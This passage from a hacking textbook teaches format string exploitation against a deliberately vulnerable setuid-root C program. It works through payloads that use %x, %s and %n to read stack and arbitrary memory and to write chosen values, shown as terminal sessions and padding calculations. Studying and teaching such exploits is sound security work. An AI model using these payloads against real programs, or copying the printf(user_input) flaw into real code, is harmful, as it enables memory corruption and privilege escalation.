A format string exploit is another technique you can use to gain control of a privileged program. Like buffer overflow exploits, format string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format string vulnerabilities and eliminate them. Although format string vulnerabilities aren't very common anymore, the following techniques can also be used in other situations.
You should be fairly familiar with basic format strings by now. They have been used extensively with functions like printf() in previous programs. A function that uses format strings, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three more arguments to the function (in addition to the format string argument).
Recall the various format parameters explained in the previous chapter.
| Parameter | Input Type | Output Type |
|---|---|---|
| %d | Value | Decimal |
| %u | Value | Unsigned decimal |
| %x | Value | Hexadecimal |
| %s | Pointer | String |
| %n | Pointer | Number of bytes written so far |
The previous chapter demonstrated the use of the more common format parameters, but neglected the less common %n format parameter. The fmt_uncommon.c code demonstrates its use.
```c
#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack example
   printf("A is %d and is at %08x. B is %x.\n", A, &A, B);

   exit(0);
}
```
This program uses two %n format parameters in its printf() statement. The following is the output of the program's compilation and execution.
```
reader@hacking:~/booksrc $ gcc fmt_uncommon.c
reader@hacking:~/booksrc $ ./a.out
The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bffff7f4. B is 7.
reader@hacking:~/booksrc $
```
The %n format parameter is unique in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes the number of bytes the function has output so far to the address in the corresponding function argument. In fmt_uncommon, this is done in two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then output, revealing that 46 bytes are found before the first %n and 113 before the second.
The stack example at the end is a convenient segue into an explanation of the stack's role with format strings:
```c
printf("A is %d and is at %08x. B is %x.\n", A, &A, B);
```
When this printf() function is called on the 32-bit x86 system used here (as with any function), the arguments are pushed to the stack in reverse order: first the value of B, then the address of A, then the value of A, and finally the address of the format string.
The stack will look like the diagram here.
The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument on the stack that corresponds to that parameter.
But what if only two arguments are pushed to the stack with a format string that uses three format parameters? Try removing the last argument from the printf() line for the stack example so it matches the line shown below.
```c
printf("A is %d and is at %08x. B is %x.\n", A, &A);
```
This can be done in an editor or with a little bit of sed magic.
```
reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c
reader@hacking:~/booksrc $ diff fmt_uncommon.c fmt_uncommon2.c
14c14
<    printf("A is %d and is at %08x. B is %x.\n", A, &A, B);
---
>    printf("A is %d and is at %08x. B is %x.\n", A, &A);
reader@hacking:~/booksrc $ gcc fmt_uncommon2.c
reader@hacking:~/booksrc $ ./a.out
The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bffffc24. B is b7fd6ff4.
reader@hacking:~/booksrc $
```
The result is b7fd6ff4. What the hell is b7fd6ff4? It turns out that since there wasn't a value pushed to the stack, the format function just pulled data from where the third argument should have been (by adding to the current frame pointer). This means 0xb7fd6ff4 is the first value found below the stack frame for the format function.
This is an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.
Sometimes programmers use printf(string) instead of printf("%s", string) to print strings. For ordinary text, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Examples of both methods are shown in fmt_vuln.c.
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);   // user input is used as the format string

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}
```
The following output shows the compilation and execution of fmt_vuln.c.
```
reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln.c
reader@hacking:~/booksrc $ sudo chown root:root ./fmt_vuln
reader@hacking:~/booksrc $ sudo chmod u+s ./fmt_vuln
reader@hacking:~/booksrc $ ./fmt_vuln testing
The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
```
Both methods seem to work with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.
```
reader@hacking:~/booksrc $ ./fmt_vuln testing%x
The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbffff3e0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
```
When the %x format parameter was used, the hexadecimal representation of a four-byte word on the stack was printed. This process can be used repeatedly to examine stack memory.
```
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
```
This is what the lower stack memory looks like. Remember that each four-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are?
```
reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x.
reader@hacking:~/booksrc $
```
As you can see, they're the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.
The %s format parameter can be used to read from arbitrary memory addresses. Since it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here:
```
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAAbffff3d0.b7fe75fc.00000000.41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
```
The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash with a segmentation fault, since this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.
```
reader@hacking:~/booksrc $ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0xbffffdd7
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
```
Here the getenvaddr program is used to get the address of the environment variable PATH. Since the program name fmt_vuln is two bytes shorter than getenvaddr, four is added to the address, and the bytes are reversed due to the byte ordering. The fourth format parameter, %s, reads from the beginning of the format string, treating that data as if it were an address passed as a function argument. Since this is the address of the PATH environment variable, the variable is printed as if a pointer to it had been passed to printf().
Now that the distance between the end of the stack frame and the beginning of the format string memory is known, the field-width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.
If the %s format parameter can be used to read an arbitrary memory address, you should be able to use the same technique with %n to write to an arbitrary memory address. Now things are getting interesting.
The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln.c program, just begging to be overwritten. The test variable is located at 0x08049794, so by using a similar technique, you should be able to write to the variable.
```
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
The right way to print user-controlled input:
??%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
??bffff3d0.b7fe75fc.00000000.
[*] test_val @ 0x08049794 = 31 0x0000001f
reader@hacking:~/booksrc $
```
As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.
```
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n
The right way to print user-controlled input:
??%x%x%x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 21 0x00000015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n
The right way to print user-controlled input:
??%x%x%100x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 120 0x00000078
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n
The right way to print user-controlled input:
??%x%x%180x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 200 0x000000c8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%400x%n
The right way to print user-controlled input:
??%x%x%400x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 420 0x000001a4
reader@hacking:~/booksrc $
```
By manipulating the field-width option of one of the format parameters before the %n, a chosen number of blank spaces can be inserted as padding in the output. This padding, in turn, controls the number of bytes written before the %n format parameter. This approach will work for small numbers, but it won't work for larger ones, like memory addresses, which would require printing billions of bytes.
Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. (Remember that the least significant byte is actually located in the first byte of the four-byte word of memory.) This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a four-byte word, as shown here:
```
Memory                         94 95 96 97
First write to 0x08049794      AA 00 00 00
Second write to 0x08049795        BB 00 00 00
Third write to 0x08049796            CC 00 00 00
Fourth write to 0x08049797              DD 00 00 00
Result                         AA BB CC DD
```
As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049794, 0x08049795, 0x08049796, and 0x08049797 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.
The first write should be easy.
```
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??%x%x%8x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 28 0x0000001c
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xaa - 28 + 8
$1 = 150
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
The right way to print user-controlled input:
??%x%x%150x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $
```
The last %x format parameter uses 8 as the field width to standardize the output. This is essentially reading a random DWORD from the stack, which could output anywhere from 1 to 8 characters. Since the first overwrite puts 28 into test_val, using 150 as the field width instead of 8 should set the least significant byte of test_val to 0xAA (0xAA is 170, and 170 - 28 + 8 = 150).
Now for the next write. Another argument is needed for another %x format parameter to increment the byte count to 187, which is 0xBB in hexadecimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049794. Since this is all still in the memory of the format string, it can be easily controlled. The word JUNK is four bytes long and will work fine.
After that, the next memory address to be written to, 0x08049795, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.
Perhaps we should think about the beginning of the format string ahead of time. The goal is to have four writes. Each one will need to have a memory address passed to it, and between the addresses, four bytes of junk are needed for each %x that increments the byte counter for the next %n format parameter. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied as data. For the entire write procedure, the beginning of the format string should look like this: 0x08049794, JUNK, 0x08049795, JUNK, 0x08049796, JUNK, 0x08049797, with each address stored in little-endian byte order.
Let's give it a try.
```
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = 52 0x00000034
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"
$1 = 126
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $
```
The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 150, since six new four-byte words (24 bytes) have been added to the front of the format string.
Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.
```
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a
[*] test_val @ 0x08049794 = 48042 0x0000bbaa
reader@hacking:~/booksrc $
```
The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Since memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.
This process can be repeated for the third and fourth writes.
```
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb"
$1 = 17
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa
reader@hacking:~/booksrc $
```
By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also be overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.
Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.
```
reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}' fmt_vuln.c > fmt_vuln2.c
reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c
7c7
<    static int test_val = -72;
---
>    static int test_val = -72, next_val = 0x11111111;
27a28
>    printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);
reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c
reader@hacking:~/booksrc $ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080497b4 = -72 0xffffffb8
[*] next_val @ 0x080497b8 = 286331153 0x11111111
reader@hacking:~/booksrc $
```
As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. For practice, let's write an address into the variable test_val again, using the new address.
Last time, a very convenient address of 0xddccbbaa was used. Since each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, the first byte of 0xCD is easy to write using the %n format parameter by outputting 205 bytes in total, using a field width of 161. But then the next byte to be written is 0xAB, which would need to have 171 bytes output. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it.
```
reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x080497f4 = 52 0x00000034
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"
$1 = 161
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0
[*] test_val @ 0x080497f4 = 205 0x000000cd
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xab - 0xcd"
$1 = -34
reader@hacking:~/booksrc $
```
Instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again and set the least significant byte to 0x06 for the third write.
```
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x1ab - 0xcd"
$1 = 222
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /d 0x1ab"
$1 = 427
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a
[*] test_val @ 0x080497f4 = 109517 0x0001abcd
[*] next_val @ 0x080497f8 = 286331136 0x11111100
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"
$1 = -165
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"
$1 = 91
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc 0 4b4e554a 4b4e554a
[*] test_val @ 0x080497f4 = 33991629 0x0206abcd
[*] next_val @ 0x080497f8 = 286326784 0x11110000
reader@hacking:~/booksrc $
```
With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.
```
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x08 - 0x06"
$1 = 2
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc 0 4b4e554a 4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002
reader@hacking:~/booksrc $
```
What happened here? The difference between 0x06 and 0x08 is only two, but eight bytes are output, resulting in the byte 0x0e being written by the %n format parameter instead. This is because the field width option for the %x format parameter is only a minimum field width, and eight bytes of data were output. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.
```
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x108 - 0x06"
$1 = 258
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc 0 4b4e554a 4b4e554a 4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $
```
Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all four bytes of the variable test_val. Any decrease in the least significant byte can be accomplished by wrapping the byte around. Also, any increase of less than eight may need to be wrapped around in a similar fashion.
Direct parameter access is a way to simplify format string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.
As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %n$d, where n is a positive integer, would access the nth parameter and display it as a decimal number.
```c
printf("7th: %7$d, 4th: %4$05d \n", 10, 20, 30, 40, 50, 60, 70, 80);
```
The preceding printf() call would have the following output:

```
7th: 70, 4th: 00040
```
First, the 70 is output as a decimal number when the format parameter %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a zero-padded field width option of 05. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.
```
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%4\$x
The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
```
In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Since this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed correctly.
Direct parameter access also simplifies the writing of memory addresses. Since memory can be accessed directly, there's no need for four-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually performs this function can just directly access a piece of memory found before the format string. For practice, let's use direct parameter access to write a more realistic-looking address of 0xbffffd72 into the variable test_val.
```
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%4\$n
The right way to print user-controlled input:
????????%4$n
The wrong way to print user-controlled input:
????????
[*] test_val @ 0x08049794 = 16 0x00000010
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0x72 - 16
$1 = 98
(gdb) p 0xfd - 0x72
$2 = 139
(gdb) p 0xff - 0xfd
$3 = 2
(gdb) p 0x1ff - 0xfd
$4 = 258
(gdb) p 0xbf - 0xff
$5 = -64
(gdb) p 0x1bf - 0xff
$6 = 192
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n
The right way to print user-controlled input:
????????%98x%4$n%139x%5$n
The wrong way to print user-controlled input:
???????? bffff3c0 b7fe75fc
[*] test_val @ 0x08049794 = 64882 0x0000fd72
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" . "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n
The right way to print user-controlled input:
????????%98x%4$n%139x%5$n%258x%6$n%192x%7$n
The wrong way to print user-controlled input:
???????? bffff3b0 b7fe75fc 0 8049794
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $
```
Since the stack doesn't need to be printed to reach our addresses, the number of bytes written at the first format parameter is 16. Direct parameter access is only used for the %n parameters, since it really doesn't matter what values are used for the %x spacers. This method simplifies the process of writing an address and shrinks the mandatory size of the format string.
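The byte-by-byte widths computed with gdb above can also be derived mechanically. The sketch below uses hypothetical helpers that are not from the book. For each target byte of the value, least significant first, it picks a %x width that advances the running output count to the next count ending in that byte. One assumption is made explicit in the code: any width below 8 is bumped by 256. A field width is only a minimum, and %x may print up to eight hex digits. That rule reproduces the choice of 258 over 2 above, but the book's own reasoning may differ.

```c
/* Width for one %Nx spacer that moves the running output count from
 * `written` to the next count whose low byte equals `target`, wrapping
 * past 0x100 when the target byte is smaller than the current low byte. */
unsigned byte_pad(unsigned written, unsigned char target)
{
    unsigned pad = (target - (written & 0xff)) & 0xff;  /* diff mod 0x100 */
    if (pad < 8)            /* assumption: keep %x from exceeding its width */
        pad += 0x100;
    return pad;
}

/* Fills pads[0..3] with the spacer widths for writing `value` one byte at
 * a time, least significant byte first, after `written` bytes have already
 * been output (16 for four 4-byte addresses). */
void byte_write_pads(unsigned value, unsigned written, unsigned pads[4])
{
    for (int i = 0; i < 4; i++) {
        unsigned char target = (unsigned char)(value >> (8 * i));
        pads[i] = byte_pad(written, target);
        written += pads[i];  /* assumes the %x value fits in its width */
    }
}
```

For 0xbffffd72 with 16 bytes already written, byte_write_pads() produces 98, 139, 258, and 192. These are the widths used in the final command above.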
Another technique that can simplify format string exploits is using short writes. A short is typically a two-byte word, and format parameters have a special way of dealing with them. A more complete description of possible format parameters can be found in the printf manual page. The portion describing the length modifier is shown in the output below.
The length modifier
    Here, integer conversion stands for d, i, o, u, x, or X conversion.

    h   A following integer conversion corresponds to a short int or
        unsigned short int argument, or a following n conversion
        corresponds to a pointer to a short int argument.
This can be used with format string exploits to write two-byte shorts. In the output below, a short is written at each end of the four-byte test_val variable. Naturally, direct parameter access can still be used.
